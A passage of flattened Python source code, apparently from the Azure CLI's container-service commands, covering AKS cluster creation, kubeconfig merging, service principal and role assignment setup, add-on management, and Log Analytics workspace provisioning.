full_config = {} full_config[subscription_id] = obj with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600), 'w+') as spFile: json.dump(full_config, spFile) def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'): config_path = os.path.join(get_config_dir(), file_name) config = load_service_principals(config_path) if not config: return None return config.get(subscription_id) def load_service_principals(config_path): if not os.path.exists(config_path): return None fd = os.open(config_path, os.O_RDONLY) try: with os.fdopen(fd) as f: return shell_safe_json_parse(f.read()) except: # pylint: disable=bare-except return None def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait, subscription_id=None): from azure.mgmt.resource.resources import ResourceManagementClient from azure.mgmt.resource.resources.models import DeploymentProperties properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental') smc = get_mgmt_service_client(cli_ctx, ResourceManagementClient, subscription_id=subscription_id).deployments if validate: logger.info('==== BEGIN TEMPLATE ====') logger.info(json.dumps(template, indent=2)) logger.info('==== END TEMPLATE ====') return smc.validate(resource_group_name, deployment_name, properties) return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties) def k8s_get_credentials(cmd, client, name, resource_group_name, path=os.path.join(os.path.expanduser('~'), '.kube', 'config'), ssh_key_file=None, overwrite_existing=False): """Download and install kubectl credentials from the cluster master :param name: The name of the cluster. :type name: str :param resource_group_name: The name of the resource group. :type resource_group_name: str :param path: Where to install the kubectl config file :type path: str :param ssh_key_file: Path to an SSH key file to use :type ssh_key_file: str """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name) _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing) def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing): if ssh_key_file is not None and not os.path.isfile(ssh_key_file): raise CLIError('Private key file {} does not exist'.format(ssh_key_file)) dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member location = acs_info.location # pylint: disable=no-member user = acs_info.linux_profile.admin_username # pylint: disable=no-member _mkdir_p(os.path.dirname(path)) path_candidate = path ix = 0 while os.path.exists(path_candidate): ix += 1 path_candidate = '{}-{}-{}'.format(path, name, ix) # TODO: this only works for public cloud, need other casing for national clouds acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location), '.kube/config', path_candidate, key_filename=ssh_key_file) # merge things if path_candidate != path: try: merge_kubernetes_configurations(path, path_candidate, overwrite_existing) except yaml.YAMLError as exc: logger.warning('Failed to merge credentials to kube config file: %s', exc) logger.warning('The credentials have been saved to %s', path_candidate) def _handle_merge(existing, addition, key, replace): if addition[key]: if existing[key] is None: existing[key] = addition[key] return for i in addition[key]: for j in existing[key]: if i['name'] == j['name']: if replace or i == j: existing[key].remove(j) else: raise CLIError('A different object named {} already exists in {}'.format(i['name'], key)) existing[key].append(i) def load_kubernetes_configuration(filename): try: with open(filename) as stream: return yaml.safe_load(stream) except (IOError, OSError) as ex: if getattr(ex, 'errno', 0) == errno.ENOENT: raise CLIError('{} does not exist'.format(filename)) else: raise except (yaml.parser.ParserError, UnicodeDecodeError) as ex: raise CLIError('Error parsing {} ({})'.format(filename, str(ex))) def merge_kubernetes_configurations(existing_file, addition_file, replace): existing = load_kubernetes_configuration(existing_file) addition = load_kubernetes_configuration(addition_file) # rename the admin context so it doesn't overwrite the user context for ctx in addition.get('contexts', []): try: if ctx['context']['user'].startswith('clusterAdmin'): admin_name = ctx['name'] + '-admin' addition['current-context'] = ctx['name'] = admin_name break except (KeyError, TypeError): continue if addition is None: raise CLIError('failed to load additional configuration from {}'.format(addition_file)) if existing is None: existing = addition else: _handle_merge(existing, addition, 'clusters', replace) _handle_merge(existing, addition, 'users', replace) _handle_merge(existing, addition, 'contexts', replace) existing['current-context'] = addition['current-context'] # check that ~/.kube/config is only read- and writable by its owner if platform.system() != 'Windows': existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode)) if not existing_file_perms.endswith('600'): logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.', existing_file, existing_file_perms) with open(existing_file, 'w+') as stream: yaml.dump(existing, stream, default_flow_style=False) current_context = addition.get('current-context', 'UNKNOWN') msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file) print(msg) def _get_host_name(acs_info): """ Gets the FQDN from the acs_info object. :param acs_info: ContainerService object from Azure REST API :type acs_info: ContainerService """ if acs_info is None: raise CLIError('Missing acs_info') if acs_info.master_profile is None: raise CLIError('Missing master_profile') if acs_info.master_profile.fqdn is None: raise CLIError('Missing fqdn') return acs_info.master_profile.fqdn def _get_username(acs_info): """ Gets the admin user name from the Linux profile of the ContainerService object. :param acs_info: ContainerService object from Azure REST API :type acs_info: ContainerService """ if acs_info.linux_profile is not None: return acs_info.linux_profile.admin_username return None def _get_acs_info(cli_ctx, name, resource_group_name): """ Gets the ContainerService object from Azure REST API. :param name: ACS resource name :type name: String :param resource_group_name: Resource group name :type resource_group_name: String """ container_services = cf_container_services(cli_ctx, None) return container_services.get(resource_group_name, name) def _rand_str(n): """ Gets a random string """ choices = string.ascii_lowercase + string.digits return ''.join(random.SystemRandom().choice(choices) for _ in range(n)) def _mkdir_p(path): # http://stackoverflow.com/a/600612 try: os.makedirs(path) except OSError as exc: # Python >2.5 if exc.errno == errno.EEXIST and os.path.isdir(path): pass else: raise def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count): instance = client.get(resource_group_name, container_service_name) instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member # null out the service principal because otherwise validation complains if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes: instance.service_principal_profile = None # null out the windows profile so that validation doesn't complain about not having the admin password instance.windows_profile = None return client.create_or_update(resource_group_name, container_service_name, instance) def list_container_services(cmd, client, resource_group_name=None): ''' List Container Services. ''' svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \ if resource_group_name else client.list() return list(svc_list) def show_service_principal(client, identifier): object_id = _resolve_service_principal(client, identifier) return client.get(object_id) def _resolve_service_principal(client, identifier): # todo: confirm with graph team that a service principal name must be unique result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier))) if result: return result[0].object_id try: uuid.UUID(identifier) return identifier # assume an object id except ValueError: raise CLIError("service principal '{}' doesn't exist".format(identifier)) def create_application(client, display_name, homepage, identifier_uris, available_to_other_tenants=False, password=None, reply_urls=None, key_value=None, key_type=None, key_usage=None, start_date=None, end_date=None): from azure.graphrbac.models import GraphErrorException password_creds, key_creds = _build_application_creds(password, key_value, key_type, key_usage, start_date, end_date) app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants, display_name=display_name, identifier_uris=identifier_uris, homepage=homepage, reply_urls=reply_urls, key_credentials=key_creds, password_credentials=password_creds) try: return client.create(app_create_param) except GraphErrorException as ex: if 'insufficient privileges' in str(ex).lower(): link = 'https://docs.microsoft.com/en-us/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long raise CLIError("Directory permission is needed for the current user to register the application. " "For how to configure, please refer '{}'. Original error: {}".format(link, ex)) raise def _build_application_creds(password=None, key_value=None, key_type=None, key_usage=None, start_date=None, end_date=None): if password and key_value: raise CLIError('specify either --password or --key-value, but not both.') if not start_date: start_date = datetime.datetime.utcnow() elif isinstance(start_date, str): start_date = dateutil.parser.parse(start_date) if not end_date: end_date = start_date + relativedelta(years=1) elif isinstance(end_date, str): end_date = dateutil.parser.parse(end_date) key_type = key_type or 'AsymmetricX509Cert' key_usage = key_usage or 'Verify' password_creds = None key_creds = None if password: password_creds = [PasswordCredential(start_date=start_date, end_date=end_date, key_id=str(uuid.uuid4()), value=password)] elif key_value: key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value, key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)] return (password_creds, key_creds) def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None): if rbac_client is None: rbac_client = get_graph_rbac_management_client(cli_ctx) if resolve_app: try: uuid.UUID(identifier) result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier))) except ValueError: result = list(rbac_client.applications.list( filter="identifierUris/any(s:s eq '{}')".format(identifier))) if not result: # assume we get an object id result = [rbac_client.applications.get(identifier)] app_id = result[0].app_id else: app_id = identifier return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True)) def create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None): return _create_role_assignment(cli_ctx, role, assignee, resource_group_name, scope) def _create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None, resolve_assignee=True): from azure.cli.core.profiles import ResourceType, get_sdk factory = get_auth_management_client(cli_ctx, scope) assignments_client = factory.role_assignments definitions_client = factory.role_definitions scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id) role_id = _resolve_role_id(role, scope, definitions_client) object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION, 'RoleAssignmentCreateParameters', mod='models', operation_group='role_assignments') parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id) assignment_name = uuid.uuid4() custom_headers = None return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers) def _build_role_scope(resource_group_name, scope, subscription_id): subscription_scope = '/subscriptions/' + subscription_id if scope: if resource_group_name: err = 'Resource group "{}" is redundant because scope is supplied' raise CLIError(err.format(resource_group_name)) elif resource_group_name: scope = subscription_scope + '/resourceGroups/' + resource_group_name else: scope = subscription_scope return scope def _resolve_role_id(role, scope, definitions_client): role_id = None try: uuid.UUID(role) role_id = role except ValueError: pass if not role_id: # retrieve role id role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role))) if not role_defs: raise CLIError("Role '{}' doesn't exist.".format(role)) elif len(role_defs) > 1: ids = [r.id for r in role_defs] err = "More than one role matches the given name '{}'. Please pick a value from '{}'" raise CLIError(err.format(role, ids)) role_id = role_defs[0].id return role_id def _resolve_object_id(cli_ctx, assignee): client = get_graph_rbac_management_client(cli_ctx) result = None if assignee.find('@') >= 0: # looks like a user principal name result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee))) if not result: result = list(client.service_principals.list( filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee))) if not result: # assume an object id, let us verify it result = _get_object_stubs(client, [assignee]) # 2+ matches should never happen, so we only check 'no match' here if not result: raise CLIError("No matches in graph database for '{}'".format(assignee)) return result[0].object_id def _get_object_stubs(graph_client, assignees): params = GetObjectsParameters(include_directory_object_references=True, object_ids=assignees) return list(graph_client.objects.get_objects_by_object_ids(params)) def _update_dict(dict1, dict2): cp = dict1.copy() cp.update(dict2) return cp def subnet_role_assignment_exists(cli_ctx, scope): network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7" factory = get_auth_management_client(cli_ctx, scope) assignments_client = factory.role_assignments for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'): if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id): return True return False def aks_browse(cmd, client, resource_group_name, name, disable_browser=False, listen_port='8001'): if not which('kubectl'): raise CLIError('Can not find kubectl executable in PATH') proxy_url = 'http://127.0.0.1:{0}/'.format(listen_port) _, browse_path = tempfile.mkstemp() # TODO: need to add an --admin option? aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path) # find the dashboard pod's name try: dashboard_pod = subprocess.check_output( ["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system", "--output", "name", "--selector", "k8s-app=kubernetes-dashboard"], universal_newlines=True) except subprocess.CalledProcessError as err: raise CLIError('Could not find dashboard pod: {}'.format(err)) if dashboard_pod: # remove any "pods/" or "pod/" prefix from the name dashboard_pod = str(dashboard_pod).split('/')[-1].strip() else: raise CLIError("Couldn't find the Kubernetes dashboard pod.") # launch kubectl port-forward locally to access the remote dashboard if in_cloud_console(): # TODO: better error handling here. response = requests.post('http://localhost:8888/openport/8001') result = json.loads(response.text) term_id = os.environ.get('ACC_TERM_ID') if term_id: response = requests.post('http://localhost:8888/openLink/{}'.format(term_id), json={"url": result['url']}) logger.warning('To view the console, please open %s in a new tab', result['url']) else: logger.warning('Proxy running on %s', proxy_url) logger.warning('Press CTRL+C to close the tunnel...') if not disable_browser: wait_then_open_async(proxy_url) try: subprocess.call(["kubectl", "--kubeconfig", browse_path, "--namespace", "kube-system", "port-forward", dashboard_pod, "{0}:9090".format(listen_port)]) except KeyboardInterrupt: # Let command processing finish gracefully after the user presses [Ctrl+C] pass finally: # TODO: Better error handling here. requests.post('http://localhost:8888/closeport/8001') def _trim_nodepoolname(nodepool_name): if not nodepool_name: return "nodepool1" return nodepool_name[:12] def _validate_ssh_key(no_ssh_key, ssh_key_value): if not no_ssh_key: try: if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value): raise ValueError() except (TypeError, ValueError): shortened_key = truncate_text(ssh_key_value) raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key)) def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals dns_name_prefix=None, location=None, admin_username="azureuser", kubernetes_version='', node_vm_size="Standard_DS2_v2", node_osdisk_size=0, node_count=3, nodepool_name="nodepool1", service_principal=None, client_secret=None, no_ssh_key=False, disable_rbac=None, enable_rbac=None, skip_subnet_role_assignment=False, network_plugin=None, pod_cidr=None, service_cidr=None, dns_service_ip=None, docker_bridge_address=None, enable_addons=None, workspace_resource_id=None, vnet_subnet_id=None, max_pods=0, aad_client_app_id=None, aad_server_app_id=None, aad_server_app_secret=None, aad_tenant_id=None, tags=None, generate_ssh_keys=False, # pylint: disable=unused-argument no_wait=False): _validate_ssh_key(no_ssh_key, ssh_key_value) subscription_id = _get_subscription_id(cmd.cli_ctx) if not dns_name_prefix: dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id) rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) if location is None: location = rg_location agent_pool_profile = ManagedClusterAgentPoolProfile( name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it count=int(node_count), vm_size=node_vm_size, os_type="Linux", storage_profile=ContainerServiceStorageProfileTypes.managed_disks, vnet_subnet_id=vnet_subnet_id, max_pods=int(max_pods) if max_pods else None ) if node_osdisk_size: agent_pool_profile.os_disk_size_gb = int(node_osdisk_size) linux_profile = None # LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified. if not no_ssh_key: ssh_config = ContainerServiceSshConfiguration( public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)]) linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config) principal_obj = _ensure_aks_service_principal(cmd.cli_ctx, service_principal=service_principal, client_secret=client_secret, subscription_id=subscription_id, dns_name_prefix=dns_name_prefix, location=location, name=name) service_principal_profile = ContainerServiceServicePrincipalProfile( client_id=principal_obj.get("service_principal"), secret=principal_obj.get("client_secret"), key_vault_secret_ref=None) if (vnet_subnet_id and not skip_subnet_role_assignment and not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)): scope = vnet_subnet_id if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor', service_principal_profile.client_id, scope=scope): logger.warning('Could not create a role assignment for subnet. ' 'Are you an Owner on this subscription?') network_profile = None if any([network_plugin, pod_cidr, service_cidr, dns_service_ip, docker_bridge_address]): network_profile = ContainerServiceNetworkProfile( network_plugin=network_plugin, pod_cidr=pod_cidr, service_cidr=service_cidr, dns_service_ip=dns_service_ip, docker_bridge_cidr=docker_bridge_address ) addon_profiles = _handle_addons_args( cmd, enable_addons, subscription_id, resource_group_name, {}, workspace_resource_id ) if 'omsagent' in addon_profiles: _ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent']) aad_profile = None if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]): if aad_tenant_id is None: profile = Profile(cli_ctx=cmd.cli_ctx) _, _, aad_tenant_id = profile.get_login_credentials() aad_profile = ManagedClusterAADProfile( client_app_id=aad_client_app_id, server_app_id=aad_server_app_id, server_app_secret=aad_server_app_secret, tenant_id=aad_tenant_id ) # Check that both --disable-rbac and --enable-rbac weren't provided if all([disable_rbac, enable_rbac]): raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.') mc = ManagedCluster( location=location, tags=tags, dns_prefix=dns_name_prefix, kubernetes_version=kubernetes_version, enable_rbac=False if disable_rbac else True, agent_pool_profiles=[agent_pool_profile], linux_profile=linux_profile, service_principal_profile=service_principal_profile, network_profile=network_profile, addon_profiles=addon_profiles, aad_profile=aad_profile) # Due to SPN replication latency, we do a few retries here max_retry = 30 retry_exception = Exception(None) for _ in range(0, max_retry): try: return sdk_no_wait(no_wait, client.create_or_update, resource_group_name=resource_group_name, resource_name=name, parameters=mc) except CloudError as ex: retry_exception = ex if 'not found in Active Directory tenant' in ex.message: time.sleep(3) else: raise ex raise retry_exception def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False): instance = client.get(resource_group_name, name) subscription_id = _get_subscription_id(cmd.cli_ctx) instance = _update_addons( cmd, instance, subscription_id, resource_group_name, addons, enable=False, no_wait=no_wait ) # send the managed cluster representation to update the addon profiles return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None, no_wait=False): instance = client.get(resource_group_name, name) subscription_id = _get_subscription_id(cmd.cli_ctx) instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True, workspace_resource_id=workspace_resource_id, no_wait=no_wait) if 'omsagent' in instance.addon_profiles: _ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent']) # send the managed cluster representation to update the addon profiles return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) def aks_get_versions(cmd, client, location): return client.list_orchestrators(location, resource_type='managedClusters') def aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=os.path.join(os.path.expanduser('~'), '.kube', 'config'), overwrite_existing=False): credentialResults = None if admin: credentialResults = client.list_cluster_admin_credentials(resource_group_name, name) else: credentialResults = client.list_cluster_user_credentials(resource_group_name, name) if not credentialResults: raise CLIError("No Kubernetes credentials found.") else: try: kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8') _print_or_merge_credentials(path, kubeconfig, overwrite_existing) except (IndexError, ValueError): raise CLIError("Fail to find kubeconfig file.") ADDONS = { 'http_application_routing': 'httpApplicationRouting', 'monitoring': 'omsagent' } def aks_list(cmd, client, resource_group_name=None): if resource_group_name: managed_clusters = client.list_by_resource_group(resource_group_name) else: managed_clusters = client.list() return _remove_nulls(list(managed_clusters)) def aks_show(cmd, client, resource_group_name, name): mc = client.get(resource_group_name, name) return _remove_nulls([mc])[0] def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="nodepool1", no_wait=False): instance = client.get(resource_group_name, name) # TODO: change this approach when we support multiple agent pools. for agent_profile in instance.agent_pool_profiles: if agent_profile.name == nodepool_name: agent_profile.count = int(node_count) # pylint: disable=no-member # null out the SP and AAD profile because otherwise validation complains instance.service_principal_profile = None instance.aad_profile = None return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) def aks_upgrade(cmd, client, resource_group_name, name, kubernetes_version, no_wait=False, **kwargs): # pylint: disable=unused-argument instance = client.get(resource_group_name, name) instance.kubernetes_version = kubernetes_version # null out the SP and AAD profile because otherwise validation complains instance.service_principal_profile = None instance.aad_profile = None return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) DEV_SPACES_EXTENSION_NAME = 'dev-spaces-preview' DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces_preview.custom' def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None, prompt=False): """ Use Azure Dev Spaces with a managed Kubernetes cluster. :param name: Name of the managed cluster. :type name: String :param resource_group_name: Name of resource group. You can configure the default group. \ Using 'az configure --defaults group=<name>'. :type resource_group_name: String :param update: Update to the latest Azure Dev Spaces client components. :type update: bool :param space_name: Name of the new or existing dev space to select. Defaults to an interactive selection experience. :type space_name: String :param prompt: Do not prompt for confirmation. Requires --space. :type prompt: bool """ if _get_or_add_extension(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update): azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE) try: azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, prompt) except TypeError: raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.") except AttributeError as ae: raise CLIError(ae) def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False): """ Remove Azure Dev Spaces from a managed Kubernetes cluster. :param name: Name of the managed cluster. :type name: String :param resource_group_name: Name of resource group. You can configure the default group. \ Using 'az configure --defaults group=<name>'. :type resource_group_name: String :param prompt: Do not prompt for confirmation. :type prompt: bool """ if _get_or_add_extension(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE): azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE) try: azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt) except AttributeError as ae: raise CLIError(ae) def _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable, workspace_resource_id=None, no_wait=False): # parse the comma-separated addons argument addon_args = addons.split(',') addon_profiles = instance.addon_profiles or {} # for each addons argument for addon_arg in addon_args: addon = ADDONS[addon_arg] if enable: # add new addons or update existing ones and enable them addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False)) # special config handling for certain addons if addon == 'omsagent': if addon_profile.enabled: raise CLIError('The monitoring addon is already enabled for this managed cluster.\n' 'To change monitoring configuration, run "az aks disable-addons -a monitoring"' 'before enabling it again.') if not workspace_resource_id: workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring( cmd, subscription_id, resource_group_name) workspace_resource_id = workspace_resource_id.strip() if not workspace_resource_id.startswith('/'): workspace_resource_id = '/' + workspace_resource_id if workspace_resource_id.endswith('/'): workspace_resource_id = workspace_resource_id.rstrip('/') addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id} addon_profiles[addon] = addon_profile else: if addon not in addon_profiles: raise CLIError("The addon {} is not installed.".format(addon)) addon_profiles[addon].config = None addon_profiles[addon].enabled = enable instance.addon_profiles = addon_profiles # null out the SP and AAD profile because otherwise validation complains instance.service_principal_profile = None instance.aad_profile = None return instance def _get_azext_module(extension_name, module_name): try: # Adding the installed extension in the path from azure.cli.core.extension.operations import add_extension_to_path add_extension_to_path(extension_name) # Import the extension module from importlib import import_module azext_custom = import_module(module_name) return azext_custom except ImportError as ie: raise CLIError(ie) def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None, workspace_resource_id=None): if not addon_profiles: addon_profiles = {} addons = addons_str.split(',') if addons_str else [] if 'http_application_routing' in addons: addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True) addons.remove('http_application_routing') # TODO: can we help the user find a workspace resource ID? if 'monitoring' in addons: if not workspace_resource_id: # use default workspace if exists else create default workspace workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring( cmd, subscription_id, resource_group_name) workspace_resource_id = workspace_resource_id.strip() if not workspace_resource_id.startswith('/'): workspace_resource_id = '/' + workspace_resource_id if workspace_resource_id.endswith('/'): workspace_resource_id = workspace_resource_id.rstrip('/') addon_profiles['omsagent'] = ManagedClusterAddonProfile( enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id}) addons.remove('monitoring') # error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is elif workspace_resource_id: raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".') # error out if any (unrecognized) addons remain if addons: raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format( ",".join(addons), "are" if len(addons) > 1 else "is")) return addon_profiles def _install_dev_spaces_extension(extension_name): try: from azure.cli.core.extension import operations operations.add_extension(extension_name=extension_name) except Exception: # nopa pylint: disable=broad-except return False return True def _update_dev_spaces_extension(extension_name, extension_module): from azure.cli.core.extension import ExtensionNotInstalledException try: from azure.cli.core.extension import operations operations.update_extension(extension_name=extension_name) operations.reload_extension(extension_name=extension_name) except CLIError as err: logger.info(err) except ExtensionNotInstalledException as err: logger.debug(err) return False except ModuleNotFoundError as err: logger.debug(err) logger.error("Error occurred attempting to load the extension module. Use --debug for more information.") return False return True def _get_or_add_extension(extension_name, extension_module, update=False): from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension) try: get_extension(extension_name) if update: return _update_dev_spaces_extension(extension_name, extension_module) except ExtensionNotInstalledException: return _install_dev_spaces_extension(extension_name) return True def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name): # log analytics workspaces cannot be created in WCUS region due to capacity limits # so mapped to EUS per discussion with log analytics team AzureLocationToOmsRegionCodeMap = { "eastus": "EUS", "westeurope": "WEU", "southeastasia": "SEA", "australiasoutheast": "ASE", "usgovvirginia": "USGV", "westcentralus": "EUS", "japaneast": "EJP", "uksouth": "SUK", "canadacentral": "CCA", "centralindia": "CIN", "eastus2euap": "EAP" } AzureRegionToOmsRegionMap = { "australiaeast": "australiasoutheast", "australiasoutheast": "australiasoutheast", "brazilsouth": "eastus", "canadacentral": "canadacentral", "canadaeast": "canadacentral", "centralus": "eastus", "eastasia": "southeastasia", "eastus": "eastus", "eastus2": "eastus", "japaneast": "japaneast", "japanwest": "japaneast", "northcentralus": "eastus", "northeurope": "westeurope", "southcentralus": "eastus", "southeastasia": "southeastasia", "uksouth": "uksouth", "ukwest": "uksouth", "westcentralus": "eastus", "westeurope": "westeurope", "westus": "eastus", "westus2": "eastus", "centralindia": "centralindia", "southindia": "centralindia", "westindia": "centralindia", "koreacentral": "southeastasia", "koreasouth": "southeastasia", "francecentral": "westeurope", "francesouth": "westeurope" } rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) default_region_name = "eastus" default_region_code = "EUS" workspace_region = AzureRegionToOmsRegionMap[ rg_location] if AzureRegionToOmsRegionMap[rg_location] else default_region_name workspace_region_code = AzureLocationToOmsRegionCodeMap[ workspace_region] if AzureLocationToOmsRegionCodeMap[workspace_region] else default_region_code default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code) default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \ '/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name) resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id) resources = cf_resources(cmd.cli_ctx, subscription_id) # check if default RG exists if resource_groups.check_existence(default_workspace_resource_group): try: resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview') return resource.id except CloudError as ex: if ex.status_code != 404: raise ex else: resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region}) default_workspace_params = { 'location': workspace_region, 'properties': { 'sku': { 'name': 'standalone' } } } async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview', default_workspace_params) ws_resource_id = '' while True: result = async_poller.result(15) if async_poller.done(): ws_resource_id = result.id break return ws_resource_id def _ensure_container_insights_for_monitoring(cmd, addon): workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID'] workspace_resource_id = workspace_resource_id.strip() if not workspace_resource_id.startswith('/'): workspace_resource_id = '/' + workspace_resource_id if workspace_resource_id.endswith('/'): workspace_resource_id = workspace_resource_id.rstrip('/') # extract subscription ID and resource group from workspace_resource_id URL try: subscription_id = workspace_resource_id.split('/')[2] resource_group = workspace_resource_id.split('/')[4] except IndexError: raise CLIError('Could not locate resource group in workspace-resource-id URL.') # region of workspace can be different from region of RG so find the location of the workspace_resource_id resources = cf_resources(cmd.cli_ctx, subscription_id) try: resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview') location = resource.location except CloudError as ex: raise ex unix_time_in_millis = int( (datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0) solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis) # pylint: disable=line-too-long template = { "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "parameters": { "workspaceResourceId": { "type": "string", "metadata": { "description": "Azure Monitor Log Analytics Resource ID" } }, "workspaceRegion": { "type": "string", "metadata": { "description": "Azure Monitor Log Analytics workspace region" } }, "solutionDeploymentName": { "type": "string", "metadata": { "description": "Name of the solution deployment" } } }, "resources": [ { "type": "Microsoft.Resources/deployments", "name": "[parameters('solutionDeploymentName')]", "apiVersion": "2017-05-10", "subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]", "resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]", "properties": { "mode": "Incremental", "template": { "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "parameters": {}, "variables": {}, "resources": [ { "apiVersion": "2015-11-01-preview", "type": "Microsoft.OperationsManagement/solutions", "location": "[parameters('workspaceRegion')]", "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]", "properties": { "workspaceResourceId": "[parameters('workspaceResourceId')]" }, "plan": { "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]", "product": "[Concat('OMSGallery/', 'ContainerInsights')]", "promotionCode": "", "publisher": "Microsoft" } } ] }, "parameters": {} } } ] } params = { 